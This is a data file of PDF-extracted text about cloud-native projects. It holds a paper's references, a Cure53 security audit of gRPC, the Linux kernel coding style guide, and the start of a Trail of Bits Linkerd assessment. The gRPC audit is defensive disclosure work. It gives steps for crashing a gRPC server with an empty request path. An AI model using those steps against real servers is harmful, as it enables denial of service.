Facebook.\nReferences\n[1] Amazon EC2. http://aws.amazon.com/ec2/ .\n[2] distcc: a fast, free distributed c/c++ compiler. http:\n//distcc.samba.org/ .\n[3] Hadoop. http://lucene.apache.org/hadoop .\n[4] Hadoop scheduling discussion. http://issues.apache.\norg/jira/browse/HADOOP-4667 .\n[5] M. J. Accetta, R. V. Baron, W. J. Bolosky, D. B. Golub,\nR. F. Rashid, A. Tevanian, and M. Young. Mach: A\nnew kernel foundation for unix development. In USENIX\nSummer , pages 93{113, 1986.\n[6] R. D. Blumofe, C. F. Joerg, B. C. Kuszmaul, C. E. Leis-\nerson, K. H. Randall, and Y. Zhou. Cilk: An e\u000ecient\nmultithreaded runtime system. In Journal of Parallel and\nDistributed Computing , pages 207{216, 1995.\n[7] V. G. Cerf, Robert, and E. Icahn. A protocol for\npacket network intercommunication. IEEE Transactions\non Communications , 22:637{648, 1974.\n[8] J. Dean and S. Ghemawat. MapReduce: Simpli\fed data\nprocessing on large clusters. In OSDI , pages 137{150,\n2004.\n[9] D. J. DeWitt, E. Paulson, E. Robinson, J. F. Naughton,\nJ. Royalty, S. Shankar, and A. Krioukov. Clustera: an\nintegrated computation and data management system.\nPVLDB , 1(1):28{41, 2008.\n[10] D. R. Engler, M. F. Kaashoek, and J. O'Toole. Exokernel:\nAn operating system architecture for application-level re-\nsource management. In SOSP , pages 251{266, 1995.\n[11] E. C. Hendricks and T. C. Hartmann. Evolution of\na virtual machine subsystem. IBM Systems Journal ,\n18(1):111{142, 1979.\n[12] M. Isard, M. Budiu, Y. Yu, A. Birrell, and D. Fetterly.\nDryad: distributed data-parallel programs from sequen-\ntial building blocks. In EuroSys 07 , pages 59{72, 2007.\n[13] D. Nurmi, R. Wolski, C. Grzegorczyk, G. Obertelli, S. So-\nman, L. Youse\u000b, and D. Zagorodnov. The eucalyptus\nopen-source cloud-computing system. In Proceedings of\nCloud Computing and Its Applications [Online] , Chicago,\nIllinois, 10 2008.\n[14] C. Olston, B. Reed, U. Srivastava, R. Kumar, and\nA. Tomkins. Pig latin: a not-so-foreign language for data\nprocessing. In SIGMOD Conference , pages 1099{1110,\n2008.\n[15] R. Pike, S. Dorward, R. Griesemer, and S. Quinlan. Inter-\npreting the data: Parallel analysis with sawzall. Scienti\fc\nProgramming , 13(4):277{298, 2005.\n[16] J. Reinders. Intel Threading Building Blocks: Out\ftting\nC++ for Mul ti-core PRocessor Parallelism . O'Reilly,\n2007.\n[17] G. Staples. Torque - torque resource manager. In SC,\npage 8, 2006.\n[18] D. Thain, T. Tannenbaum, and M. Livny. Distributed\ncomputing in practice: the Condor experience. Concur-\nrency and Computation - Practice and Experience , 17(2-\n4):323{356, 2005.\nNotes\n1That is, 99% of map tasks read from local disk.\n2Any opinions, \fndings, conclusions, or recommendations\nexpressed in this publication are those of the authors and do\nnot necessarily re\rect the views of the NSF.\n5" } ]
{ "category": "Orchestration & Management", "file_name": "grpc_security_audit.pdf", "project_name": "gRPC", "subcategory": "Remote Procedure Call" }
[ { "data": " Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nPentest-Report gRPC 09.-10.2019\nCure53, Dr.-Ing. M. Heiderich, M. Wege, MSc. D. Weißer, J. Larsson,\nBSc. J. Hector, MSc. N. Krein, Dipl.-Ing. A. Inführ\nIndex\nIntroduction\nScope\nTest Methodology\nPart 1: Manual Code Auditing\nPart 2: Code-Assisted Penetration Testing\nIdentified Vulnerabilities\nGRP-01-001 Server: DoS through uninitialized pointer dereference (Medium)\nMiscellaneous Issues\nGRP-01-002 General: Refs to freed memory not automatically nulled (Low)\nGRP-01-003 General: Calls to malloc suffer from potential integer overflows (Low)\nConclusions\nIntroduction\n“gRPC is a modern open source high performance RPC framework that can run in any\nenvironment. It can efficiently connect services in and across data centers with\npluggable support for load balancing, tracing, health checking and authentication. It is\nalso applicable in last mile of distributed computing to connect devices, mobile\napplications and browsers to backend services.”\nFrom https://grpc.io/about/\nThis report documents the findings of a security assessment targeting the gRPC\nsoftware. Carried out by Cure53 in autumn 2019, this project specifically entailed a\npenetration test and a source code audit. Featuring primarily the C++ implementation\nfrom the v1.2.4.x branch of gRPC maintained by Google, the tests were generously\nsponsored by CNCF.\nAs for the resources, seven senior testers from the Cure53 were tasked with completing\nthis project. After being commissioned by CNCF to execute the assessment, the Cure53\nteam worked with a budget of eighteen person-days, all spent on the scope and\nCure53, Berlin · 10/15/19 1/11 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \ndocumentation in late September and early-to-mid October of 2019. The focus was\nplaced on the aspects linked to the HTTP2 stack, gRPC compression features and\nbuffering mechanisms.\nThe Cure53 team followed the white-box methodology, which is a typical approach for\nCNCF projects and signifies access to the codebase which is actually available as open\nsource. In addition, a GCP environment which was initially set up by Cure53 and later\nsupplanted with two additional environments furnished by Google, served as a close\napproximation of what could be found in a production environment. Cure53 further got\nbriefed by Google about the key focus areas for this audit noted above.\nIn order to best address the three main arenas, three Work Packages (WPs) have been\ndelineated. While WP1 specifically focused on the HTTP2 Protocol Stack, the tests\nperformed for WP2 entailed investigating encryption and authentication mechanisms and\ndeployments. Finally, in WP3 Cure53 honed in on the compression and buffering\nfeatures. The two-pronged strategy, which again is typical for CNCF-funded projects,\nwas also deployed here and meant that work has been divided into dedicated\npenetration testing and the phase of code auditing. Specific tasks are further elaborated\non in the Coverage section of this document.\nThe project started as scheduled and progressed quickly. During the assessment,\nCure53 communicated with the Google team in a jointly used Slack channel, enabling\nreal-time exchanges. In the interest of time efficiency, findings were live-reported to the\ngRPC team, so that the fixes could be discussed by the involved parties. Among three\nissues spotted in the codebase, one has been categorized as a security vulnerability\nwith a risk level set to “Medium”. The remaining flaws were considered to only signify\ngeneral weaknesses without much exploitation potential. This outcome is quite\nimpressive, especially given the thorough and focused penetration testing, fuzzing and\ncode auditing approaches. Consequently, this Cure53 assessment points towards a\nrather positive result and a decent level of code maturity at gRPC.\nThe report will now shed more light on the scope used for this assessment and then\nelaborate on the testing methodology and test coverage. It then moves on to discussing\nall spotted findings in chronological order, as well as with sufficient technical depth and\ndetail. Finally, the report will close with a conclusion in which the Cure53 team\nelaborates on the impressions gathered during the assessment. Both broad and more\ngranular recommendations regarding the security properties of the tested gRPC\nsoftware ensue.\nCure53, Berlin · 10/15/19 2/11 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nScope\n•gRPC - the C++ based RPC library and framework\n◦WP1 : HTTP/2 Protocol Stack\n◦WP2 : Encryption and Authentication\n◦WP3 : Compression and Buffering\n◦Sources were available via GitHub\n▪https://github.com/grpc/grpc/tree/v1.24.x \n◦Environment and Instructions\n▪A test environment on GCP was available for the Cure53 team and co-\nmaintained by Google to foster testing\n▪Cure53 further received detailed instructions about key focus areas and software\nsetup from Google\nTest Methodology\nThe following paragraphs describe the testing methodology used during the audit of the\ngRPC codebase. The test was driven by two approaches over three Work Packages.\nEach strategy - i.e. code auditing and pentesting - fulfilling different goals. In particular,\nthe manual source code reviews centered on spotting insecure code patterns. Usually\nissues around memory corruption issues, race conditions, information leakage or similar\nflaws can be found in this context. During the second phase, it was evaluated whether\nthe stated security goals and premise can, in fact, withstand real-life attack scenarios.\nPart 1: Manual Code Auditing\nThis section lists the steps that were undertaken during the first phase of the audit\nagainst the gRPC software compound. Since no major issues were spotted, the list\nportrays the thoroughness of the audit and attests to the impressively high quality of the\nproject.\n•After familiarizing themselves with the documentation and codebase, Cure53\nteam continued checking of string functions and memory allocation wrappers\nspotted in the codebase in scope. Auditing of the usual C-language-relevant\ndangerous sinks, like memcpy, strcpy, sprintf etc. took place in the early phase of\nthe code analysis.\n•Further attention was given to how Base64-encoded input is being treated and\nthe Cure53 team attempted to cause the decoder to stumble by providing\nmalformed Base64 sequences using training bytes, malformed padding\nsequences and illegal characters. It was demonstrated that no issues could be\nspotted in this area and that the handling of Base64 by gRPC was generally well-\nimplemented.\nCure53, Berlin · 10/15/19 3/11 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \n•Attention was also dedicated to the implementation of the GZIP and DEFLATE\ncompression and decompression. It was quickly found that gRPC makes use of\nstandard libraries such as zlib and that the integration of those was done\nproperly. The tests attempting to cause a Denial-of-Service or alike were\nunsuccessful and the implementation made a good impression.\n•Further attention was given to the HPACK parser implementation - especially\navenues where indices are being utilized or where different type and length\nvalues could be used - as specified in RFC 75401. One area in the audited code\nappeared to be affected by an Integer Underflow but a closer analysis showed\nthat indeed all necessary checks were put in place by the maintainers to keep\nthis issue from having any effect.\n•A code audit against the implementation of the header element construction was\nperformed to check if the results of the parsing processes are handled well. No\nsignificant findings could be identified.\n•In addition, the code handling message frames, i.e. in core/ext/transport/chttp2/\ntransport/parsing.cc, were inspected and checked for errors potentially allowing\nfor DoS, memory corruption or alike. No implementation flaws could be observed\nand the code makes a clean impression.\nPart 2: Code-Assisted Penetration Testing\nThe following list documents the distinguishable steps taken during the second part of\nthe test. A code-assisted penetration test was executed against the pre-configured\nserver instance on GCP running gRPC and provided by the development team. Since\nonly a few miscellaneous issues were found during the first part of the audit, this\nadditional approach was used to ensure maximum coverage of the originally defined\nattack surface.\n•All previously discovered gRPC vulnerabilities were closely inspected to gain a\ngeneral overview of repeating patterns and possible avenues to be explored.\n•The test-cases for all encryption and authentication aspects were evaluated, in\nparticular in the realm of handling broken certificates. Items interfacing with\nBoringSSL were found to be done properly and no errors could be identified.\n•A locally modified version of greeter_server_tls was used to inspect the TLS\nprotocol exchange alongside verifying the validity of simultaneously recorded\ntcpdump output.\n•The execution flow and source code between greeter_client_tls and\ngreeter_server_tls was cross-referenced to obtain an overview of the exposed\ncomponents.\n1 https://tools.ietf.org/html/rfc7540#page-12\nCure53, Berlin · 10/15/19 4/11 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \n•The application of oversized and malformed key and certificate files was\nattempted to probe the handling of such errors. The code was found to be\nhandling all cases terminally but gracefully.\n•A working fuzzer setup was created and tested. Once successful, the fuzzer was\nrun over the course of the penetration test and audit. It managed to in fact\nproduce a couple of useful results, for instance GRP-01-001.\n•Extensive binary analysis of the fuzzer-generated backtraces in combination with\nthe source code was undertaken to unveil additional problems but success was\nlimited due to time constraints.\n•Further penetration testing and fuzzing attention was given to the compression-\nand decompression-related implementations for channels and messages in the\ntested codebase. It was checked if any undocumented compression algorithms\nwere supported but this proved not to be the case.\n•Tests making use of compression bombs were performed by creating a modified\ngRPC client capable of sending those. No findings were spotted in this realm;\nafter a certain threshold (i.e. 7MB of payload) value, the server started to ignore\ncompressed payload and fell back to the uncompressed text.\n•Additionally, sending of varying slice counts to the server was attempted to see if\nany unexpected behavior could be provoked. Cure53 gave up on this since no\nproblematic reactions could be observed.\nCure53, Berlin · 10/15/19 5/11 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nIdentified Vulnerabilities\nThe following sections list both vulnerabilities and implementation issues spotted during\nthe testing period. Note that findings are listed in chronological order rather than by their\ndegree of severity and impact. The aforementioned severity rank is simply given in\nbrackets following the title heading for each vulnerability. Each vulnerability is\nadditionally given a unique identifier (e.g. GRP-01-001) for the purpose of facilitating any\nfuture follow-up correspondence.\nGRP-01-001 Server: DoS through uninitialized pointer dereference (Medium)\nWhile fuzzing the communication between the gRPC greeter example client, a\nsegmentation fault was observed due to dereferencing a null pointer. This led to a\nDenial-of-Service (DoS). Upon further investigation of the crash, it was discovered that\nan empty path in the request headers causes this issue.\nThe following code excerpt highlights the relevant parts.\nAffected File:\nsrc/core/lib/surface/server.cc\nAffected Code:\nstatic void start_new_rpc(grpc_call_element* elem) {\n channel_data* chand = static_cast<channel_data*>(elem->channel_data);\n call_data* calld = static_cast<call_data*>(elem->call_data);\n[...]\n if (chand->registered_methods && calld->path_set && calld->host_set) {\n[...]\n /* check for a wildcard method definition (no host set) */\n hash = GRPC_MDSTR_KV_HASH(0, grpc_slice_hash_internal(calld->path));\n for (i = 0; i <= chand->registered_method_max_probes; i++) {\n rm = &chand->registered_methods[(hash + i) %\n chand->registered_method_slots];\n if (!rm) break;\n if (rm->has_host) continue;\n if (!grpc_slice_eq(rm->method, calld->path)) continue;\n if ((rm->flags & GRPC_INITIAL_METADATA_IDEMPOTENT_REQUEST) &&\n 0 == (calld->recv_initial_metadata_flags &\n GRPC_INITIAL_METADATA_IDEMPOTENT_REQUEST)) {\n continue;\n }\n finish_start_new_rpc(server, elem, &rm->server_registered_method->matcher,\n rm->server_registered_method ->payload_handling);\nCure53, Berlin · 10/15/19 6/11 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nWhen the empty path is used to compute the hash value for indexing the\nregistered_methods array, it is possible that the resulting index points to an entry that\nhas not been initialized. Since the allocated space for the given array is filled with null\nvalues, the server_registered_method pointer will be null.\nIt should be noted that the crash does not trigger reliably and depends on the global\nseed value used for computing the hashes. This seed value changes with every restart\nof the application. Therefore, when trying to reproduce the issue, it may be necessary to\nrestart the server application multiple times.\nSteps to reproduce:\n•Download the gRPC helloworld client\n•Replace the path in Greeter_method_names with an empty string\n•Run the client against a gRPC server\nIt is recommended to ensure that no empty value for path can be given.\nMiscellaneous Issues\nThis section covers those noteworthy findings that did not lead to an exploit but might aid\nan attacker in achieving their malicious goals in the future. Most of these results are\nvulnerable code snippets that did not provide an easy way to be called. Conclusively,\nwhile a vulnerability is present, an exploit might not always be possible.\nGRP-01-002 General: Refs to freed memory not automatically nulled (Low)\nWhile auditing the gRPC’s underlying memory allocation functionalities and wrappers\naround the libc malloc function family, it was noticed that pointers to freed memory are\nnot automatically nulled. Instead, coding patterns like the following were observed.\nExamples:\n•gpr_free(service_config);\nservice_config = nullptr;\n•gpr_free(tbl->ents);\ntbl->ents = nullptr;\n•gpr_free(s->header_array.headers);\ns->header_array.headers = nullptr;\n•etc...\nThis pattern of freeing memory and manually setting the corresponding pointer to nullptr\nstems from the fact that the wrapper around libc’s free is implemented without\nautomatically setting this pointer to null as a mandatory operation.\nCure53, Berlin · 10/15/19 7/11 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nAffected File:\ngrpc/src/core/lib/gpr/alloc.cc\nAffected Code:\nvoid gpr_free(void* p) {\n GPR_TIMER_SCOPE(\"gpr_free\", 0);\n g_alloc_functions.free_fn(p);\n}\nConsidering the fact that it is easy to forget to reset the freed pointer to null when\nnecessary, it might make sense to implement this in gpr_free itself. It should be\nconsidered to rewrite gpr_free so that it accepts the address of the pointer as a\nparameter and resets the pointer to null after the final call to free. Automatically setting\nunused pointers to nullptr is not only a defensive style that protects against dangling\npointer bugs or use after frees, it also makes sure that developers cannot omit important\nnullptr assignments.\nGRP-01-003 General: Calls to malloc suffer from potential integer overflows (Low)\nAnother more general weakness was found in the usage of allocation functions in\ngRPC’s libc wrappers around malloc. As one can see in the following code, gpr_malloc\nis not implemented in a way that takes care of allocating memory for an array of\nelements with the same size for each element.\nAffected File:\ngrpc/src/core/lib/gpr/alloc.cc\nAffected Code:\nvoid* gpr_malloc(size_t size) {\n GPR_TIMER_SCOPE(\"gpr_malloc\", 0);\n void* p;\n if (size == 0) return nullptr;\n p = g_alloc_functions.malloc_fn(size);\n if (!p) {\n abort();\n }\n return p;\n}\nNevertheless, code like in the following snippets is used to make room for multiple\nelements in one single call to gpr_malloc.\nCure53, Berlin · 10/15/19 8/11 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nExamples:\n•uri_parser.cc\nuri->query_parts_values =\n static_cast<char**>(gpr_malloc( uri->num_query_parts * \nsizeof(char**)));\n•http_connect_handshaker.cc\n•headers = static_cast<grpc_http_header*>(\n gpr_malloc(sizeof(grpc_http_header) * num_header_strings ));\n•etc …\nAlthough no concrete scenario of this vulnerability being in effect was spotted, this\ncoding pattern is oftentimes prone to integer overflows when multiplying array sizes with\nthe number of the array’s elements.\nIt is recommended to create a calloc(size_t nmemb, size_t size) style wrapper that takes\ncare of allocating nmemb elements of size for each item. Internally, it should be checked\nfor integer overflow when multiplying both values inside the function. This not only\nrepresents a more defensive coding pattern that tries to prevent certain bug classes, but\nalso takes the burden away from developers who otherwise would need to check for\ninteger overflows.\nCure53, Berlin · 10/15/19 9/11 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nConclusions\nThis Cure53 report clearly demonstrates a strong security posture of the investigated\ngRPC software. After spending eighten days on the scope in September and October of\n2019, seven members of the Cure53 team can conclude that the project complies with\nits security promises.\nDuring this CNCF-funded project, an explicit focus was placed on analyzing the HTTP2\nprotocol flow, where especially the parsing and unpacking of different headers was\nevaluated. Considering the small time-frame, only rudimentary checks could be\nperformed. In parallel to auditing of the source code, the provided helloworld\nserver/client was fuzzed with a modified version of AFL. This yielded a DoS vulnerability\nin the server. However, no other bugs were found using this methodology, pointing to the\ngRPC’s strengths.\nThe HTTP data compressions pertinent to GZIP and DEFLATE use standard libraries\nand were therefore excluded from the code audit. The compression features were\nnevertheless manually pentested and stood strong to Cure53’s scrutiny. As part of the\nanalysis connected to the crash desc ribed in GRP-01-001, a more in-depth look into the\nHPACK parsing code was taken. Overall, the code made a good impression in that it\nfollows good coding practices and displays proper checks in critical areas, for example\nthe uint32 number parsing paid special attention to detection of integer overflows. A\ncloser look at the frame similarly revealed it to be well-written, indicating a coding\nguideline being strictly followed by the developers.\nThe TLS examples were used as a basis for analyzing the TLS implementation in gRPC.\nHere the malformed strings and certificate constructs were evaluated in the pursuit to\nfind logical flaws in the implementation. Crashes were observed but none of them were\ndeemed to be of security value, since they required patching the example binaries with\nout-of-bounds strings and values. No bugs were discovered during this phase and,\nsimilarly, no leaks were observed during the analysis of TLS traffic, handshakes, etc.\nThe protocol sequences displayed no anomalies.\nThe existence and mandatory inclusion of a regression test, several sanitizer\ncomponents and the integration of a fuzzing infrastructure to the protocol aspects further\ntranslates to building on the notion of a responsibly maintained software system. Setting\nup a test harness proved to be straightforward and reliable. The development team gave\ndetailed instructions on how to build all of the necessary components, again confirming\nthat having their project tested poses no issue. It must be emphasized that, considering\nthe large codebase and the existing constraints of the audit, a significant but far from\ncomplete code coverage has been achieved.\nCure53, Berlin · 10/15/19 10/11 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nIn sum, judging from the somewhat limited coverage achieved during this code audit and\ncode-assisted penetration test, the Cure53 team can only attest to a very high quality of\nthe examined gRPC system. This autumn 2019 project ascertained that the gRPC team\nis fully capable of delivering excellent results in terms of security and maintainability.\nCure53 would like to thank Srini Polavarapu, Hope Casey-Allen, Nicolas Noble and April\nKyle Nassi of Google , as well as Chris Aniszczyk of The Linux Foundation, for their\nexcellent project coordination, support and assistance, both before and during this\nassignment. Special gratitude also needs to be extended to The Linux Foundation for\nsponsoring this project.\nCure53, Berlin · 10/15/19 11/11" } ]
{ "category": "Orchestration & Management", "file_name": "coding_style.pdf", "project_name": "Slurm", "subcategory": "Scheduling & Orchestration" }
[ { "data": "Linux Kernel Coding Style\nLinus Torvalds\nThis is a short document describing the preferred coding style for the linux kernel. \nCoding style is very personal, and I won't force my views on anybody, but this is what goes for anything that I have to be able to maintain, and I'd prefer it for most other things too. Please at least consider the points made here.\nFirst off, I'd suggest printing out a copy of the \nGNU coding standards, and NOT read it. \nBurn them, it's a great symbolic gesture.Anyway, here goes:\nChapter 1: Indentation\nTabs are 8 characters, and thus indentations are also 8 characters. There are heretic \nmovements that try to make indentations 4 (or even 2!) characters deep, and that is akin to trying to define the value of PI to be 3.\nRationale: The whole idea behind indentation is to clearly define where a block of \ncontrol starts and ends. Especially when you've been looking at your screen for 20 straight hours, you'll find it a lot easier to see how the indentation works if you have large indentations.\nNow, some people will claim that having 8-character indentations makes the code move \ntoo far to the right, and makes it hard to read on a 80-character terminal screen. The answer to that is that if you need more than 3 levels of indentation, you're screwed anyway, and should fix your program.\nIn short, 8-char indents make things easier to read, and have the added benefit of \nwarning you when you're nesting your functions too deep. Heed that warning.Linux kernel coding style\nChapter 2: Placing Braces\nThe other issue that always comes up in C styling is the placement of braces. Unlike the \nindent size, there are few technical reasons to choose one placement strategy over the other, but the preferred way, as shown to us by the prophets Kernighan and Ritchie, is to put the opening brace last on the line, and put the closing brace first, thusly:\nif (x is true) {\n we do y}\nHowever, there is one special case, namely functions: they have the opening brace at the \nbeginning of the next line, thus:\nint function(int x)\n{ body of function}\nHeretic people all over the world have claimed that this inconsistency is ... well ... \ninconsistent, but all right-thinking people know that (a) K&R are right and (b) K&R are right. Besides, functions are special anyway (you can't nest them in C).\nNote that the closing brace is empty on a line of its own, except in the cases where it is \nfollowed by a continuation of the same statement, i.e. a \"while\" in a do-statement or an \"else\" in an if-statement, like this:\ndo {\n body of do-loop} while (condition);\nand\nif (x == y) { ..} else if (x > y) { ...} else {Linux kernel coding style\n ....\n}\nRationale: K&R.\nAlso, note that this brace-placement also minimizes the number of empty (or almost \nempty) lines, without any loss of readability. Thus, as the supply of new-lines on your screen is not a renewable resource (think 25-line terminal screens here), you have more empty lines to put comments on.\nChapter 3: Naming\nC is a Spartan language, and so should your naming be. Unlike Modula-2 and Pascal programmers, C programmers do not use cute names like \nThisVariableIsATemporaryCounter. A C programmer would call that variable \ntmp, which is much easier to write, and not the least more difficult to understand.\nHowever, while mixed-case names are frowned upon, descriptive names for global \nvariables are a must. To call a global function foo is a shooting offense.\nGlobal variables (to be used only if you really need them) need to have descriptive \nnames, as do global functions. If you have a function that counts the number of active \nusers, you should call that count_active_users() or similar, you should not call \nit cntusr().\nEncoding the type of a function into the name (so-called Hungarian notation) is brain \ndamaged - the compiler knows the types anyway and can check those, and it only confuses the programmer. No wonder Microsoft makes buggy programs.\nLocal variable names should be short, and to the point. If you have some random integer \nloop counter, it should probably be called i. Calling it loop_counter is non-\nproductive, if there is no chance of it being mis-understood. Similarly, tmp can be just \nabout any type of variable that is used to hold a temporary value.\nIf you are afraid to mix up your local variable names, you have another problem, which \nis called the function-growth-hormone-imbalance syndrome. See next chapter.Linux kernel coding style\nChapter 4: Functions\nFunctions should be short and sweet, and do just one thing. They should fit on one or \ntwo screenfuls of text (the ISO/ANSI screen size is 80×24, as we all know), and do one thing and do that well.\nThe maximum length of a function is inversely proportional to the complexity and \nindentation level of that function. So, if you have a conceptually simple function that is just one long (but simple) case-statement, where you have to do lots of small things for a lot of different cases, it's ok to have a longer function.\nHowever, if you have a complex function, and you suspect that a less-than-gifted first-\nyear high-school student might not even understand what the function is all about, you should adhere to the maximum limits all the more closely. Use helper functions with descriptive names (you can ask the compiler to in-line them if you think it's performance-critical, and it will probably do a better job of it that you would have done).\nAnother measure of the function is the number of local variables. They shouldn't exceed \n5-10, or you're doing something wrong. Re-think the function, and split it into smaller pieces. A human brain can generally easily keep track of about 7 different things, anything more and it gets confused. You know you're brilliant, but maybe you'd like to understand what you did 2 weeks from now.\nChapter 5: Commenting\nComments are good, but there is also a danger of over-commenting. NEVER try to explain HOW your code works in a comment: it's much better to write the code so that the working is obvious, and it's a waste of time to explain badly written code. \nGenerally, you want your comments to tell WHAT your code does, not HOW. Also, try \nto avoid putting comments inside a function body: if the function is so complex that you need to separately comment parts of it, you should probably go back to chapter 4 for a while. You can make small comments to note or warn about something particularly clever (or ugly), but try to avoid excess. Instead, put the comments at the head of the Linux kernel coding style\nfunction, telling people what it does, and possibly WHY it does it.\nChapter 6: You've made a mess of it\nThat's ok, we all do. You've probably been told by your long-time unix user helper that \n\"GNU emacs\" automatically formats the C sources for you, and you've noticed that yes, it does do that, but the defaults it uses are less than desirable (in fact, they are worse than random typing - a infinite number of monkeys typing into GNU emacs would never make a good program).\nSo, you can either get rid of GNU emacs, or change it to use saner values. To do the \nlatter, you can stick the following in your .emacs file:\n(defun linux-c-mode ()\n \"C mode with adjusted defaults for use with the Linux kernel.\" (interactive) (c-mode) (setq c-indent-level 8) (setq c-brace-imaginary-offset 0) (setq c-brace-offset -8) (setq c-argdecl-indent 8) (setq c-label-offset -8) (setq c-continued-statement-offset 8) (setq indent-tabs-mode nil) (setq tab-width 8))\nThis will define the M-x linux-c-mode command. When hacking on a module, if \nyou put the string -*- linux-c -*- somewhere on the first two lines, this mode \nwill be automatically invoked. Also, you may want to add\n(setq auto-mode-alist (cons '(\"/usr/src/linux.*/.*\\\\.[ch]\n$\" . linux-c-mode) auto-mode-alist))\nto your .emacs file if you want to have linux-c-mode switched on automagically when \nyou edit source files under /usr/src/linux.Linux kernel coding style\nBut even if you fail in getting emacs to do sane formatting, not everything is lost: use \n\"indent\".\nNow, again, GNU indent has the same brain dead settings that GNU emacs has, which is \nwhy you need to give it a few command line options. However, that's not too bad, because even the makers of GNU indent recognize the authority of K&R (the GNU people aren't evil, they are just severely misguided in this matter), so you just give indent the options \"-kr -i8\" (stands for \"K&R, 8 character indents\").\n\"indent\" has a lot of options, and especially when it comes to comment re-formatting \nyou may want to take a look at the manual page. But remember: \"indent\" is not a fix for bad programming." } ]
{ "category": "Orchestration & Management", "file_name": "Linkerd - Final Report.pdf", "project_name": "Linkerd", "subcategory": "Service Mesh" }
[ { "data": " L i n k e r d \n S e c u r i t y A s s e s s me n t \n February 14, 2022 \n Prepared for: \n Oliver Gould \n Linux Foundation \n Prepared by: \n Alex Useche and David Pokora \n A b o u t T r a i l o f B i t s \n Founded in 2012 and headquartered in New York, Trail of Bits provides technical security \n assessment and advisory services to some of the world’s most targeted organizations. We \n combine high- end security research with a real -world attacker mentality to reduce risk and \n fortify code. With 80+ employees around the globe, we’ve helped secure critical software \n elem ents that support billions of end users, including Kubernetes and the Linux kernel. \n We maintain an exhaustive list of publications at https://github.com/trailofbits/publications , \n with links to papers, presentations, public audit reports, and podcast appearances. \n In recent years, Trail of Bits consultants have showcased cutting-edge research through \n presentations at CanSecWest, HCSS, Devcon, Empire Hacking, GrrCon, LangSec, NorthSec, \n the O’Reilly Security Conference, PyCon, REcon, Security BSides, and SummerCon. \n We specialize in software testing and code review projects, supporting client organizations \n in the technology, defense, and finance industries, as well as government entities. Notable \n clients include HashiCorp, Google, Microsoft, Western Digital, and Zoom. \n Trail of Bits also operates a center of excellence with regard to blockchain security. Notable \n projects include audits of Algorand, Bitcoin SV, Chainlink, Compound, Ethereum 2.0, \n MakerDAO, Matic, Uniswap, Web3, and Zcash. \n To keep up to date with our latest news and announcements, please follow @trailofbits on \n Twitter and explore our public repositories at https://github.com/trailofbits . To engage us \n directly, visit our “Contact” page at https://www.trailofbits.com/contact , or email us at \n info@trailofbits.com . \n Trail of Bits, Inc. \n 228 Park Ave S #80688 \n New York, NY 10003 \n https://www.trailofbits.com \n info@trailofbits.com \n T r a i l o f B i t s 1 Linkerd Security Assessment \n C O N F I D E N T I A L \n N o t i c e s a n d R e m a r k s \n C o p y r i g h t a n d D i s t r i b u t i o n \n © 2022 by Trail of Bits, Inc. \n All rights reserved. Trail of Bits hereby asserts its right to be identified as the creator of this \n report in the United Kingdom. \n This report is considered by Trail of Bits to be confidential information; it is licensed to the \n Linux Foundation under the terms of the project statement of work and intended solely for \n internal use by the Linux Foundation. Material within this report may not be reproduced or \n distributed in part or in whole without the express written permission of Trail of Bits. \n T es t C o v er a g e D i s c l a i m er \n All activities undertaken by Trail of Bits in association with this project were performed in \n accordance with a statement of work and mutually agreed upon project plan. \n Security assessment projects are time-boxed and often reliant on information that may be \n provided by a client, its affiliates, or its partners. As such, the findings documented in this \n report should not be considered a comprehensive list of security issues, flaws, or defects in \n the target system or codebase. \n T r a i l o f B i t s 2 Linkerd Security Assessment \n C O N F I D E N T I A L \n T a b l e o f Co n t e n t s \n About Trail of Bits 1 \n Notices and Remarks 2 \n Table of Contents 2 \n Executive Summary 5 \n Project Summary 6 \n Project Goals 7 \n Project Targets 8 \n Project Coverage 9 \n Summary of Findings 10 \n Detailed Findings 11 \n 1. Various unhandled errors 11 \n 2. The use of time.After() in select statements can lead to memory leaks 13 \n 3. Use of string.Contains instead of string.HasPrefix to check for prefixes 14 \n 4. Risk of resource exhaustion due to the use of defer inside a loop 15 \n 5. Lack of maximum request and response body constraint 16 \n 6. Potential goroutine leak in Kubernetes port-forwarding initialization logic 18 \n 7. Risk of log injection in TAP service API 19 \n 8. TLS configuration does not enforce minimum TLS version 20 \n 9. Nil dereferences in the webhook server 22 \n A. Vulnerability Categories 24 \n B. Code Quality Findings 26 \n C. Running GCatch 27 \n T r a i l o f B i t s 3 Linkerd Security Assessment \n C O N F I D E N T I A L \n T r a i l o f B i t s 4 Linkerd Security Assessment \n C O N F I D E N T I A L \n E x e c u t i v e S u m m a r y \n E n g a g em en t O v er v i e w \n The Linux Foundation engaged Trail of Bits to review the security of its Linkerd service \n mesh. From January 31 to February 14, 2022, a team of two consultants conducted a \n security review of the client-provided source code, with two person-weeks of effort. Details \n of the project’s timeline, test targets, and coverage are provided in subsequent sections of \n this report. \n P r o j ec t S c o p e \n Our testing efforts were focused on the identification of flaws that could result in a \n compromise of confidentiality, integrity, or availability of the target system. We conducted \n this audit with access to the linkerd2 repository and supporting public documentation. \n S u m m a r y o f F i n d i n g s \n The audit did not uncover any significant flaws or defects that could impact system \n confidentiality, integrity, or availability. A summary of the findings is provided below. \n E X P O S U R E A N A L Y S I S \n Severity Count \n Low 3 \n Inform 